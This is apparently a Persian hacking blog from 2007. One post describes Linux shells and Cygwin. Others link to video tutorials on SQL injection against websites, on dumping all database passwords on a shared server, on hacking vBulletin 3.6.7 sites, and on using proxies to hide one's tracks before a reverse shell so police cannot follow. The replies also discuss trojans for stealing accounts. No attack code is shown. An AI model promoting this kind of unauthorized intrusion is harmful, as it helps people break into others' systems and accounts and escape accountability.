چون که شل لینوکس از کامپایلر و دیباگر و ... خیلی خوبی بهرمند هست و این چیزی هست که در ویندوز نیست  مثلا کامپایلر gcc   در لینوکس قابلیت خیلی زیادی داره و در ضمن در عین قدیمی بودن خیلی هم قوی هست !!

کلا یه شل خوب باید  برنامه های زیر رو ساپورت کنه  ::

Netstat     برای دیدن سوکت ها .

Gcc          برای کامپایل کردن زبان c

Lynx        یکی از browser  های خیلی معتبر و عالی

telnet       برای ارتباط به پورت ها و ....

dig           این یکی رو کمتر شلی داره یا این که پولیه !!!

ftp            برای تبادل اطلاعات !

Finger     این یکی هم اطلاعات رو از کاربر میگیره .

 

چگونه میتونیم یه شل لینوکسی در ویندوز داشته باشیم ؟؟؟

شما میتونید برای این کار از برنامه cygwin   استفاده کنید . اون رو نصب کنید و بعد دستورات خودتون رو مثلا ls – la  رو اجرا کنید !!! خیلی برنامه عجیبی هست و میتونید همه اون برنامه هایی که در لینوکس فقط قابل اجرا هستن رو اجرا کنید مثلا اون برنامه هایی که با پسونده .sh   هستن . البته اگه یه نسخه کامل از این برنامه رو گیر اوردین یکی هم برای من بفرسیتید !!

البته بعضی از isp  ها خیلی لازج بازی در میارن و یعضی وقت ها اکانت شل رو به مشتری هاشون میدن برای اطلاعات بیشتر به isp   خودتون تماس بگیرید بعد ازشون بپرسید .

و بسیاری از راه های دیگه هم هست که این جا , جای توضیح اون ها نیست .

 

ایا باید با زبان شل ها رو بلد باشم ؟؟؟

در جواب باید بگم که یاد گرفتن زبان شل هایی مثله command.com   یا   bash  از نون شب هم واجب تره !

البته شل bash   به خاطر امکانات بیشتری که داره کار باهاش هم سخت تره و همچینین دستورات و فرامین بیشتری رو در خود جا داده .

بدیهی هست که دستورات شل ها مختلف هست مثلا در command.com   از   دستور  ver   برای دیدن مشخصات سیستم عامل بکار میره  ولی همین دستور در لینوکس و در شلر اون که bash   هست  دستور uname –a   استفاده میشه .

ولی در اکثر جا ها خیلی با هم فرق ندارن مثلا دستورات در لینوکس و سلاریس تقریبا یکی هست !!

 

خوب این ها هم خلاصه ای از اطلاعات من بود درباره شل ها امیدوارم که مفید واقع شده باشه و تونسته باشم که اطلاعاتی خوبی به شما داده باشم .

در اپ بعدی جوابه سوالات شما عزیزان داده خواهد شد پس اگر سوالی دارید حتما بپرسید یا اگر قبلا پرسیده بودید کپی پیس کنید در قسمت نظرات این بخش .

موفق باشید .

فعلا بای تا های

|+| نوشته شده توسط mehdi در 86/07/24  |
 پاک کردن رد پا با پراکسی

سلام دوستان عزیزم .

ببخشید که من اینقدر دیر به دیر اپ میکنم این مدرسه ها اصلا وقت برای ادم نمی ذاره .

تو این درس تصویری شما رو با پاک کردن رد پا با پراکسی ها اشنا میکنم .

بهتون پیشنهاد میکنم که حتما از این  برای پاک  کردن رد پا استاده کنید چون که پاک کردن رده پا خیلی خیلی مهمه و اگه اون سروری که دارید روش کار میکنید یه کمی شاخ باشه دیگه کارتون تمومه تا سیستم رو خاموش کنید پلیس ها ریختن دمه درتون و ....

بعدم اینو بهتون بگم که قبل از این که کاری توی سرور انجام بدید از این روش رو انجام بدید بعد برید برای شله معکوس و ...

خوب دیگه خیلی صحبت نمیکنم میتونید فیلم رو از لینک زیر دانلود کنید و حالش رو ببرید :::

 

دانلود فیلم اموزشی 

 

اگه فیلم کمی و کاستی داشت دیگه به بزرگی خودتون ببخشید .

اقا پویان عزیز اون روش های هکی (ایدی) که در اون وبلاگ گفته هیچ کدوم کار نمیده . اگه شما تروجانی داری که فکر میکنی که کار میده اما خودت بلد نیستی درست ازش استفاده کنی لینکش رو بده تا ببینم چی کار میکنم . موفق باشی

خوب دیگه من برم .

موفق باشید . التماس دعا

فعلا بای تا های

 

|+| نوشته شده توسط mehdi در 86/07/17  |
 Sql Turorials

 با سلام به همه دوستان عزیز ببخشید که یه مدت نبودم امروز میخوام شما رو با نحوه ی هک کردن سایت های که روشون اسیب پذیری Sql هست اشنا کنیم من سه تا فیلم کامل که توسط دوست عزیزم هادی از بروبچ ویرانگر تهیه کرده رو براتون میزارم یکم حجمشون بالاست ولی واقعا با توضیحات صوتی که تو فیلم میده خستگی دانلود رو از تن ادم بیرون میاره این فیلم در سه بخش تهیه شده که از اول شما رو به نحوه تست اسیب پذیری و... که اخر سر حتی بتونید با دستورات Sql پسورد user رو نیز تغییر بدید به پایان میرسونه دیگه زیاد توضیح نمیدم فیلم واقعا کامل هستش امید وار لذت ببرید .

 

SQL Part 1

 SQl Part 2

SQl Part 3

 

به همراه این ها برای اینکه تلافی کنم این مدت که نبودم یه سری مقاله SQL از سری مقاله های شبگرد رو هم براتون میزارم  که واقعا به درد بخرد هستن امید وارم نهایت استفاده رو ببرید .

 

Download

|+| نوشته شده توسط مدیر وبلاگ در 86/07/11  |
 به دست اوردن تمامی پسورد های دیتابیس سایت های روی سرور

سلام دوستان عزیزم .

من مهدی هستم میخام که تو این درس تصویری شما عزیزان رو با نحوه به دست اوردن تمامی پسورد های دیتابیس سایت های روی سرور اشنا کنم . این فیلم رو من تو هیچ فرومی نیدیدم خیلی چیزه توپی شده حتما ببینید .

میتونید اون رو از لینک زیر دانلود کنید ::

 

 دانلود فیلم اموزشی

 

اگه فیلم مشکلی داشت به بزرگی خودتون ببخشید .

شرمنده که اینقدر دیر اپ میکنم سرم  شولوغه الانم تو کافی نتم !!

 

جوابه دوستمون اقا پویان رو بدم و برماقا پویان اگه میشهاون فایل هایی که تو سیدی شرفی هست رو اپلود کن بعد لینکش رو بده اخه من که خودم سیدی شرقی رو  ندارم یکی از دوستام میگفت از اون روش میشه ایدی رو هک کرد  حالا هر چی داره اپ کن تا بهت جواب بدم بعدم بهت میگم که چرا بعضی از تروجان ها بعد از مدتی دیگه کار نمیکنن .

ایشالله سرم خلوت شد میام جو.ابه همه سوالاتون رو میدم .

 

موفق باشین .

فعلا بای تا های
|+| نوشته شده توسط mehdi در 86/07/07  |
 vBulletin ۳.۶.۷ فیلم اموزشی هک کردن سایت های !!

سلام دوستان عزیزم .
ببخشید که یه چند روزی نبودم ولی تو این فیلم اموزشی که براتون میذارم جبران میکنم .
جواب سوالات رو هم نمیتونم بدم . شرمنده .

تو این فیلم اموزشی طریقه هک کردن سایت های زیر رو اموزش خواهید دید .

vBulletin ۳.۶.۷ !!

خیلی توضیح نمیدم شما میتونید فیلم رو از لینک زیر دانلود کنید و حالش رو ببرید ::

دانلود فلیم اموزشی

دو تا کرکر هم براتون میذارم یکیش همراه فیلم اموزشی هست و یکی دیگه هم تو لینک زیر هست ::

دانلود کرکر

خوب همونطور که میدونید پسورد های هش شده این پرتال ها خیلی بد کرک میشن و ممکنه که چند ساعتی طول بکشن .

اما من فقط جوابه اقا پویان رو بگم که اینگار عجله دارن :: در جوابه ایشون باید بگم که شما اگه میتونید همه اون تروجان ها یا فایل هایی که برای هک کردن ایدی و وبلاگ هست رو اپلود کن بعد لینک اون ها رو به من بده . تا ببینم میتونم برات کاری کنم یا نه . موفق باشی .

خوب دوستان ببخشید اینقدر زود میخام برم . شرمنده.
فعلا بای تا های

|+| نوشته شده توسط mehdi در 86/07/02  |
 
 
بالا